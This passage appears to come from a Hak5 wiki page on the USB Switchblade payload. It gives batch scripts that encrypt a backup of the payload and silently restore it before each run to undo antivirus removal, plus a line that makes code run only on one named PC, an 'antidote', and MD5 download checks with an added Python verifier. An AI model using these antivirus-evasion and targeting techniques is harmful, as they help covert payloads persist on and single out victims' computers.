- Your switchblade is now restored back to the last time you ran "Update_Archive.bat"

IMPORTANT: Every time you make a change on your switchblade that you wish to keep, be sure to run the "Update_Archive.bat" to save the changes to the backup. If you don't, the restore function will revert your switchblade to the last time the Update_Archive.bat was run.

Here's the code if you want to take a look at it (these batch files come premade with rar.exe in the download above):
Update_Archive.bat:

:: Removes old backup if it exists
::
del ".\Backup.rar"

:: Archives and encrypts the contents of the switchblade with a stupidly long password
::
.\rar.exe a -hp[nowayinhelltheycanbreakkthispassword9876309531681145690] -r ".\Backup.rar" "..\"

Restore.bat:

:: Creates a backup copy of our backup. This is just in case you didn't plug your switchblade into
:: a safe computer before attempting to restore. This should keep your real backup safe while the
:: Antivirus nukes the copy
::
copy ".\Backup.rar" ".\Backup_Safe.rar"

:: Here we unarchive the copy of the backup we just made
::
.\rar.exe x -o+ -p[nowayinhelltheycanbreakkthispassword9876309531681145690] ".\Backup_Safe.rar" "..\"

:: And now that it's finished, we delete the backup of the backup.
::
del ".\Backup_Safe.rar"

After you've made an initial backup of your switchblade, you can have go.bat restore the entire contents of your switchblade before each run by adding this little bit of code to the very beginning of Go.bat:

nircmd execmd CALL ..\..\Restore\Restore.bat

This will use nircmd.exe to silently launch the safe-restore function automatically, before every payload run. This should keep your payload safe from antivirus programs that delete or rename files on the switchblade.

Orient the Switchblade towards a special computer

If you want some code to be executed only on a specific computer, use this line. cmd compares strings literally, so both sides are wrapped in double quotes (single quotes would never match), and /i makes the comparison case-insensitive:

if /i "%computername%"=="PETER" goto peterspc

Replace PETER with the name of that PC. Then add the block below. A label does not stop execution, so the code that runs on every other machine has to jump past the block (here goto :EOF ends the batch file); otherwise the PETER-only code would also run on them:

goto :EOF
:peterspc
:: Here type in the code that should only be executed on the PC PETER

--steve

Antidote

If you rooted yourself or someone you didn't want to, use the antidote: http://www.hak5.org/packages/files/antidote.rar --spektormax
There are 2 antidotes, antidote(HOME).cmd and antidote(PRO).cmd. This is because Windows XP Pro has the tool taskkill while Home only has tskill. The Pro one can force-stop a process even when it doesn't want to be stopped; the Home one cannot. Use the Pro one if you can, use Home if you only have XP Home.

Note on MD5

If you're paranoid or not sure, you can check the MD5 hash of the file--spektormax
In order to check the MD5 hash of the file you can use this package: http://www.hak5.org/packages/files/md5.zip
you would do :

md5.exe filename

it will calculate the MD5 hash of that file.
Use:

md5.exe -csignature filename

to test a signature and compare it to the file that you downloaded. More info can be found at the MD5 page where the MD5.exe is originally from.
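The check above, as an added example in Python (not code from this page or from Hak5) so it runs without md5.exe: it verifies a set of downloads against an md5sum-style list of "<digest>  <filename>" lines, reporting ok, MISMATCH or missing per file, and compares digests in constant time. md5.exe's -c<signature> form checks one file against one digest; this does the same for a whole list. The manifest and the file contents are constructed, and the avkill.exe entry is deliberately wrong to show a mismatch. As the note in this section says, a matching digest only proves the download was not corrupted in transit and says nothing about whether the file on the server was swapped; MD5 is also collision-prone, so treat this as a download check, not as authentication.

```python
"""Verify downloaded files against a published MD5 list.

Added example, not code from the Hak5 page. MANIFEST and FILES are constructed
test data; the avkill.exe digest is deliberately wrong.
"""
import hashlib
import hmac

MANIFEST = """\
# <md5 hex digest>  <filename>
900150983cd24fb0d6963f7d28e17f72  nircmd.exe
9e107d9d372bb6826bd81d3542a419d6  md5.exe
00000000000000000000000000000000  avkill.exe
d41d8cd98f00b204e9800998ecf8427e  missing.exe
"""

FILES = {  # filename -> bytes, standing in for the downloaded files
    "nircmd.exe": b"abc",
    "md5.exe": b"The quick brown fox jumps over the lazy dog",
    "avkill.exe": b"tampered",
}


def parse_manifest(text):
    """Return {filename: lowercase digest}; reject malformed lines loudly."""
    entries = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2 or len(parts[0]) != 32:
            raise ValueError("manifest line %d: expected '<md5> <filename>'" % lineno)
        digest, name = parts[0].lower(), parts[1].strip()
        int(digest, 16)  # raises ValueError on non-hex digits
        entries[name] = digest
    return entries


def md5_hex(data):
    return hashlib.md5(data).hexdigest()


def verify(manifest_text, files):
    """Per manifest entry: 'ok', 'MISMATCH', or 'missing' when no such file was supplied."""
    results = {}
    for name, expected in parse_manifest(manifest_text).items():
        if name not in files:
            results[name] = "missing"
            continue
        actual = md5_hex(files[name])
        # constant-time compare so the check itself leaks nothing about the digest
        results[name] = "ok" if hmac.compare_digest(actual, expected) else "MISMATCH"
    return results


if __name__ == "__main__":
    for name, status in verify(MANIFEST, FILES).items():
        print(name, status)
```

To check real downloads, replace FILES with `{name: open(name, "rb").read()}` for each file in the list.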

Note: because these pages can be edited by anyone, these MD5s offer no guarantee files have not been altered on the server, only that you downloaded them correctly. 76.17.119.30 18:32, 19 October 2006 (PDT)

MD5's

--spektormax